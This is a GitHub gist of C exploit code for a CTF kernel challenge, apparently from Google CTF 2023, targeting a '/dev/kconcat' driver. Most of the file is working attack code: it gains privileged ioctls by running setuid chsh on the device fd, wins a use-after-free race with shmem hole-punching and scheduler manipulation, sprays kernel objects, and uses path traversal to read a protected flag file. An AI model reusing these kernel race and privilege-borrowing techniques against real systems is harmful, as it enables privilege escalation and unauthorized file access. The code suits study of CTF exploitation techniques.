Skip to content

Instantly share code, notes, and snippets.

@pqlx
Created June 25, 2023 18:14
Show Gist options
  • Save pqlx/b1ed41e7557c042bcc7a8c74ea1feae8 to your computer and use it in GitHub Desktop.
Save pqlx/b1ed41e7557c042bcc7a8c74ea1feae8 to your computer and use it in GitHub Desktop.
gctf 2023
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdbool.h>
#include <string.h>
#include <pthread.h>
#include <fcntl.h>
#include <errno.h>
#include <poll.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <sys/mount.h>
#include <stdatomic.h>
#include <sys/wait.h>
#define WRITE_ONCE(x, val) \
do { \
*(volatile typeof(x) *)&(x) = (val); \
} while (0)
#define READ_ONCE(x) (*(const volatile __unqual_scalar_typeof(x) *)&(x))
#define outfile (stderr)
#define LOGGING
#ifdef LOGGING
#define _do_log(prefix, fmt, ...) do { fprintf(outfile, prefix " %s: " fmt "\n", __func__, ##__VA_ARGS__);} while(0)
#define log_info(fmt, ...) _do_log("[+] ", fmt, ##__VA_ARGS__)
#define log_fail(fmt, ...) _do_log("[-] ", fmt, ##__VA_ARGS__)
#define log_error(fmt, ...) log_fail("%s (%d) - " fmt, strerror(errno), errno, ##__VA_ARGS__)
#define log_debug log_info
#else
#define _do_log(prefix, fmt, ...) //do { fprintf(outfile, prefix " %s: " fmt "\n", __func__, ##__VA_ARGS__);} while(0)
#define log_info(fmt, ...) //_do_log("[+] ", fmt, ##__VA_ARGS__)
#define log_fail(fmt, ...) //_do_log("[-] ", fmt, ##__VA_ARGS__)
#define log_error(fmt, ...) //log_fail("%s (%d) - " fmt, strerror(errno), errno, ##__VA_ARGS__)
#define log_debug log_info
#endif
#define log_info_ts(fmt, ...) \
({ \
struct timespec __now; \
clock_gettime(CLOCK_MONOTONIC, &__now); \
log_info("(@ %ld.%.9ld) " fmt, __now.tv_sec, __now.tv_nsec, ##__VA_ARGS__); \
})
void hexdump(const void* data, size_t size)
{
char ascii[17];
size_t i, j;
ascii[16] = '\0';
for (i = 0; i < size; ++i) {
printf("%02X ", ((unsigned char*)data)[i]);
if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') {
ascii[i % 16] = ((unsigned char*)data)[i];
} else {
ascii[i % 16] = '.';
}
if ((i+1) % 8 == 0 || i+1 == size) {
printf(" ");
if ((i+1) % 16 == 0) {
printf("| %s \n", ascii);
} else if (i+1 == size) {
ascii[(i+1) % 16] = '\0';
if ((i+1) % 16 <= 8) {
printf(" ");
}
for (j = (i+1) % 16; j < 16; ++j) {
printf(" ");
}
printf("| %s \n", ascii);
}
}
}
}
int pin_cpu_for(pid_t tid, int cpu)
{
cpu_set_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(cpu, &cpuset);
if (sched_setaffinity(tid, sizeof(cpuset), &cpuset) < 0) {
log_error("sched_setaffinity() (cpu=%d)", cpu);
return -1;
}
return 0;
}
int pin_cpu(int cpu)
{
return pin_cpu_for(0, cpu);
}
static int sys_sched_setscheduler(pid_t pid, int policy, struct sched_param* param)
{
return syscall(__NR_sched_setscheduler, pid, policy, param);
}
int set_sched_for(pid_t tid, int policy)
{
struct sched_param param = {.sched_priority = 0};
int res;
if ((res = sys_sched_setscheduler(tid, policy, &param)) < 0)
log_error("sched_setscheduler(%d, %d, {0})", tid, policy);
return res;
}
void* mmap_shared_anon(size_t sz)
{
return mmap(NULL, (sz + 0xffful) & ~0xffful, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
}
void* mmap_priv_anon(size_t sz)
{
return mmap(NULL, (sz + 0xffful) & ~0xffful, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
}
void mutex_init_shared(pthread_mutex_t* mutex, int shared_flag)
{
pthread_mutexattr_t attr;
pthread_mutexattr_init(&attr);
pthread_mutexattr_setpshared(&attr, shared_flag);
pthread_mutex_init(mutex, &attr);
}
void mutex_init_shared_andlock(pthread_mutex_t* mutex, int shared_flag)
{
mutex_init_shared(mutex, shared_flag);
pthread_mutex_lock(mutex);
}
extern char** environ;
__attribute__((noreturn))
static void bootstrap()
{
char* args[] = {
"/bin/sh",
"-c",
"stty ocrnl -onlcr && exec /tmp/exploit/exp 0",
NULL
};
execve("/bin/sh", args, environ);
__builtin_unreachable();
}
static int kconcat_open()
{
int res = open("/dev/kconcat", O_RDWR);
if (res < 0)
log_error("open /dev/kconcat");
return res;
}
static int kconcat_add_privs(int kfd)
{
pid_t child_pid;
if (!(child_pid = fork())) {
char* args[] = {"/bin/chsh", NULL};
close(0);
dup2(kfd, 0);
/* chsh will exit because kconcat is not a tty,
* but any privileged ioctl gives the kconcat privs */
execve(args[0], args, environ);
log_error("execve() failed??");
exit(0);
}
/* reap the child once it's exited */
int status;
if (waitpid(child_pid, &status, 0) < 0) {
log_error("waitpid(%d, .., 0)", child_pid);
return -1;
}
log_info("kconcat %d: added privs", kfd);
return 0;
}
static int kconcat_add_template(int kfd, const char* filename)
{
int res;
if ((res = ioctl(kfd, 0x1234, filename)) < 0) {
log_error("ioctl(%d, 0x1234, %s)", kfd, filename);
} else {
//log_info("kconcat %d: added template file \"%s\"", kfd, filename);
}
return res;
}
static int kconcat_do_mod(int kfd, const char* needle)
{
int res;
if ((res = ioctl(kfd, 0x1337, needle) < 0)) {
log_error("ioctl(%d, 0x1337, %s)", kfd, needle);
} else {
log_info_ts("kconcat %d: moderation for \"%s\" completed", kfd, needle);
}
return 0;
}
static ssize_t kconcat_read(int kfd, char* buf, size_t nbuf)
{
ssize_t res = read(kfd, buf, nbuf);
if (res < 0) {
log_error("read(%d, %p, 0x%lx)", kfd, buf, nbuf);
} else {
log_info("kconcat %d: read 0x%lx bytes", kfd, res);
hexdump(buf, res);
}
return res;
}
static ssize_t kconcat_write(int kfd, const char* buf, size_t nbuf)
{
ssize_t res = write(kfd, buf, nbuf);
if (res < 0) {
log_error("write(%d, %p, 0x%lx)", kfd, buf, nbuf);
} else {
log_info_ts("kconcat %d: wrote 0x%lx bytes to %p", kfd, res, buf);
//hexdump(buf, res);
}
return res;
}
struct uaf_rw_desc {
bool read;
int kfd;
void* addr;
size_t sz;
/* set after finished */
ssize_t res;
atomic_bool done;
};
struct mm_block_task {
pthread_mutex_t mutex;
pid_t pid;
void* stack;
struct {
pthread_t thread;
pthread_mutex_t mutex;
} shmem_fault_blocker;
struct {
pthread_t thread;
pthread_mutex_t mutex;
atomic_bool started;
} uaf_fault_blocker;
};
struct hole_punch_thread {
pthread_t thread;
pthread_mutex_t mutex;
atomic_bool started;
pid_t pid;
};
struct shmem_file {
int fd;
atomic_size_t sz;
void* map;
};
struct uaf_rw {
struct uaf_rw_desc desc;
size_t uaf_off;
size_t uaf_size;
size_t n_map_pages;
void* map_base;
uint32_t read_needle;
pthread_mutex_t parent_mutex;
struct shmem_file shmem_file;
struct hole_punch_thread hole_punch_thread;
struct mm_block_task child;
};
#define MIB_PAGES (1ul << 8)
const char* rw_desc_mode_str(const struct uaf_rw_desc* desc)
{
return desc->read ? "read" : "write";
}
static void pollread(int fd)
{
struct pollfd p[1] = { {.fd = fd, .events = POLLIN}};
if (poll(p, 1, -1) < 0)
log_error("poll({%d, POLLIN}, 1, -1)", fd);
}
static int uaf_read_create_needle_seg(struct uaf_rw* rw)
{
/* strlen() is done before blocking, so important to have enough*/
char seg[0x200];
memset(seg, '_', 0x200);
snprintf(seg, sizeof seg, "%.4x", rw->read_needle);
return kconcat_write(rw->desc.kfd, seg, rw->uaf_off + rw->uaf_size);
}
static void* fallocate_holepunch_thread_fn(void* _arg)
{
struct uaf_rw* rw = _arg;
struct hole_punch_thread* me = &rw->hole_punch_thread;
me->pid = getpid();
log_info("HOLEPUNCH spawned");
pthread_mutex_lock(&me->mutex);
//set_sched_for(0, SCHED_BATCH);
pthread_mutex_unlock(&rw->child.uaf_fault_blocker.mutex);
set_sched_for(0, SCHED_IDLE);
log_info_ts("HOLEPUNCH about to start");
rw->hole_punch_thread.started = true;
if (fallocate(rw->shmem_file.fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE, 0, rw->shmem_file.sz) < 0)
log_error("falloc() hole punch failed");
log_info_ts("HOLEPUNCH finished");
sleep(10000);
}
// static void* fallocate_blocker_thread_fn(void* _arg)
// {
// struct uaf_rw* rw = _arg;
// void* map = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, rw->shmem_file.fd, 0);
// madvise(map, 0x1000, MADV_DONTNEED);
// pthread_mutex_lock(&rw->child.shmem_fault_blocker.mutex);
// set_sched_for(0, SCHED_BATCH);
// pthread_mutex_unlock(&rw->child.uaf_fault_blocker.mutex);
// set_sched_for(0, SCHED_IDLE);
// log_info_ts("HOLEBLOCK about to start");
// __asm__ __volatile__("": : :"memory");
// WRITE_ONCE(*((uint64_t*)map), 0xdeadbeef0badc0deul);
// log_info_ts("HOLEBLOCK finished");
// }
static void* uaf_rw_thread_fn(void* _arg)
{
struct uaf_rw* rw = _arg;
struct uaf_rw_desc* rw_desc = &rw->desc;
// for (size_t i = 0; i < 1000; i++)
// rand();
/* explicitly fault in the page with the first stuff*/
size_t prefix_pages = rw->uaf_off ? 1 : 0;
if (prefix_pages)
WRITE_ONCE(*(uint64_t*)rw->map_base, 0x5555555555555555ul);
madvise(rw->map_base + prefix_pages * 0x1000, 0x1000, MADV_DONTNEED);
log_info_ts("UAF THREAD initialized");
pthread_mutex_lock(&rw->child.uaf_fault_blocker.mutex);
set_sched_for(0, SCHED_IDLE);
pthread_mutex_unlock(&rw->parent_mutex);
log_info_ts("UAF THREAD about to begin");
while (!rw->hole_punch_thread.started)
usleep(1000);
rw->child.uaf_fault_blocker.started = true;
if (rw_desc->read) {
rw_desc->res = kconcat_read(rw_desc->kfd, rw_desc->addr, rw_desc->sz);
} else {
rw_desc->res = kconcat_write(rw_desc->kfd, rw_desc->addr, rw_desc->sz);
hexdump(rw_desc->addr, rw_desc->sz);
}
rw_desc->done = true;
log_info_ts("UAF THREAD ended");
sleep(10000);
return NULL;
}
int thread_spawn_child_fn(void* _arg)
{
struct uaf_rw* rw = _arg;
struct mm_block_task* me = &rw->child;
log_info("thread spawner child started");
mutex_init_shared_andlock(&me->shmem_fault_blocker.mutex, PTHREAD_PROCESS_SHARED);
mutex_init_shared_andlock(&me->uaf_fault_blocker.mutex, PTHREAD_PROCESS_SHARED);
//pthread_create(&me->shmem_fault_blocker.thread, NULL, fallocate_blocker_thread_fn, rw);
pthread_create(&me->uaf_fault_blocker.thread, NULL, uaf_rw_thread_fn, rw);
size_t shmem_sz = (MIB_PAGES * 64) * 0x1000;
if (fallocate(rw->shmem_file.fd, 0, 0, shmem_sz) < 0)
log_error("falloc() initial allocation failed");
rw->shmem_file.sz = shmem_sz;
pthread_mutex_lock(&me->mutex);
}
struct uaf_rw* uaf_rw_create(size_t uaf_off, size_t uaf_size, bool is_read)
{
static uint32_t __next_read_needle = 0;
if (uaf_off >= 0x200) {
log_fail("nonsensical uaf_off 0x%lx", uaf_off);
return NULL;
} else if (uaf_size == 0 || uaf_size >= 0x200) {
log_fail("nonsencial uaf_size 0x%lx", uaf_size);
return NULL;
}
size_t result_size = (sizeof(struct uaf_rw) + 0xfff) & ~0xfff;
struct uaf_rw* rw = mmap_shared_anon(result_size);
if (rw == MAP_FAILED) {
log_error("mmap() for uaf_rw");
return NULL;
}
rw->uaf_off = uaf_off;
rw->uaf_size = uaf_size;
size_t prefix_pages = rw->uaf_off ? 1 : 0;
rw->n_map_pages = prefix_pages + 1;
rw->shmem_file.fd = memfd_create("uaf", 0);
rw->shmem_file.sz = 0;
if (fcntl(rw->shmem_file.fd, F_SETFL, O_DIRECT) < 0)
log_error("fcntl");
if ((rw->map_base = mmap_shared_anon(rw->n_map_pages * 0x1000)) == MAP_FAILED) {
log_error("mmap() failed for uaf_rw");
munmap(rw, result_size);
return NULL;
} else if (mmap(rw->map_base + prefix_pages * 0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_SHARED, rw->shmem_file.fd, 0) !=
rw->map_base + prefix_pages * 0x1000) {
log_error("mmap() for prefix page");
munmap(rw->map_base, rw->n_map_pages * 0x1000);
munmap(rw, result_size);
return NULL;
}
rw->desc.addr = (rw->map_base + (prefix_pages * 0x1000)) - rw->uaf_off;
rw->desc.sz = rw->uaf_off + rw->uaf_size;
rw->desc.kfd = kconcat_open();
if ((rw->desc.read = is_read)) {
rw->read_needle = __next_read_needle++;
uaf_read_create_needle_seg(rw);
}
if ((rw->child.stack = mmap_shared_anon(16 * 0x1000)) == MAP_FAILED)
log_error("mmap for child stack");
mutex_init_shared_andlock(&rw->child.mutex, PTHREAD_PROCESS_SHARED);
mutex_init_shared_andlock(&rw->parent_mutex, PTHREAD_PROCESS_SHARED);
mutex_init_shared_andlock(&rw->hole_punch_thread.mutex, PTHREAD_PROCESS_SHARED);
pthread_create(&rw->hole_punch_thread.thread, NULL, fallocate_holepunch_thread_fn, rw);
clone(thread_spawn_child_fn, rw->child.stack + 16 * 0x1000 - 0x10, CLONE_FILES, rw);
while (!rw->shmem_file.sz)
usleep(50000);
return rw;
}
static void uaf_rw_activate(struct uaf_rw* rw)
{
set_sched_for(0, SCHED_BATCH);
log_info_ts("PARENT activate");
pthread_mutex_unlock(&rw->hole_punch_thread.mutex);
//set_sched_for(0, SCHED_OTHER);
pthread_mutex_lock(&rw->parent_mutex);
while (!rw->child.uaf_fault_blocker.started)
usleep(1000);
//set_sched_for(rw->hole_punch_thread.pid, SCHED_IDLE)
//set_sched_for(0, SCHED_BATCH);
log_info_ts("PARENT woke up");
}
static void uaf_write_set_uafdata(struct uaf_rw* rw, const void* uaf_data)
{
memcpy(rw->desc.addr + rw->uaf_off, uaf_data, rw->uaf_size);
}
static void uaf_write_set_needle(struct uaf_rw* rw, const void* needle)
{
memcpy(rw->desc.addr, needle, rw->uaf_off);
}
// module_close 0xffffffffc0000000, module_open 0xffffffffc0000080
// module_ioctl 0xffffffffc00005e0, module_read 0xffffffffc00002a0
// module_write 0xffffffffc0000470
int main(int argc, char** argv)
{
if (argc <= 1) {
bootstrap();
return -1;
}
struct rlimit nofile = {};
getrlimit(RLIMIT_NOFILE, &nofile);
nofile.rlim_cur = nofile.rlim_max;
setrlimit(RLIMIT_NOFILE, &nofile);
int mod_kfd = kconcat_open();
if (kconcat_add_privs(mod_kfd) < 0)
return -1;
struct uaf_rw* uaf_writer = uaf_rw_create(16, 128, false);
if (!uaf_writer)
return -1;
log_info("created uaf writer");
int sprayer_kfds[12];
char fillbuf[510];
memset(fillbuf, 'A', sizeof fillbuf);
for (size_t i = 0; i < 12; i++) {
sprayer_kfds[i] = kconcat_open();
kconcat_write(sprayer_kfds[i], fillbuf, sizeof fillbuf);
}
char to_write[256];
memset(to_write, 0, sizeof to_write);
uaf_write_set_needle (uaf_writer, "XAXAXAXAXAXAXAXA");
strcpy(to_write, "sage-templates/../../../../flag");
if (!fork()) {
uaf_rw_activate(uaf_writer);
kconcat_do_mod(mod_kfd, "XAXAXAXAXAXAXAXA");
uaf_write_set_uafdata(uaf_writer, to_write);
for (size_t i = 0; i < 12; i++) {
for (size_t ii = 0; ii < 4; ii++)
kconcat_add_template(sprayer_kfds[i], "nopwning");
}
log_info_ts("added templates");
while (!uaf_writer->desc.done)
usleep(1000);
char buf[0x1000];
for (size_t i = 0; i < 12; i++) {
kconcat_add_privs(sprayer_kfds[i]);
kconcat_read(sprayer_kfds[i], buf, 0x1000);
}
}
sleep(10000);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment